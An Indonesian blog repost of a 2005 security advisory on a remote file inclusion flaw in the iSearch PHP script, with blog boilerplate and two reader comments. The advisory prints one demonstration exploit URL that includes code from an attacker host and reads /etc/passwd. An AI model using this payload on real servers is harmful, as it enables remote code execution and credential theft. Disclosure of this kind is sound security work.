'isearch.inc.php' includes the following files relative to the user-supplied $isearch_path variable:
isearch_core.inc.php
isearch_spider.inc.php
i search_search.inc.php
A remote user can reportedly supply a specially crafted URL that will include arbitrary PHP code from a remote location and execute the code on the target system. The code, including operating system commands, will execute with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/isearch/isearch.inc.php?isearch_path=http://[attacker]?&cmd=cat /etc/passwd
The author indicates that this vulnerability was reported by blackcobra-x.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution: No solution was available at the time of this entry.
Vendor URL: www.isearchthenet.com/isearch/index.php (Links to External Site)
Cause: Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: taktau@taktau.cc
Friday, December 09, 2005
How To 8
Subscribe to:
Post Comments (Atom)
About Me
![[Valid Atom 1.0]](http://img98.imageshack.us/img98/5126/validatomqv8.png "Validate my Atom 1.0 feed")
... karena BLOG JUGA ADALAH KARYA CIPTA. Biasakan untuk meminta ijin kepada pemilik karya atau paling tidak menyebutkan sumber asal. Hitung-hitung bersilaturahmi dan memperluas pergaulan, bukan?
Semua unsur blog ini, termasuk gambar, foto, tulisan dan lainnya berada di bawah aturan Creative Common License, kecuali disebutkan sebaliknya.
2 comments:
kok ndak mau yah
Injeksi perlu kesabaran dan keberuntungan. Btw, kalo bisa POC injeksinya sekalian di bagi disini. Jadi biar kita semua bisa jelas memahami mekanisme injectnya. Good job dude!
Post a Comment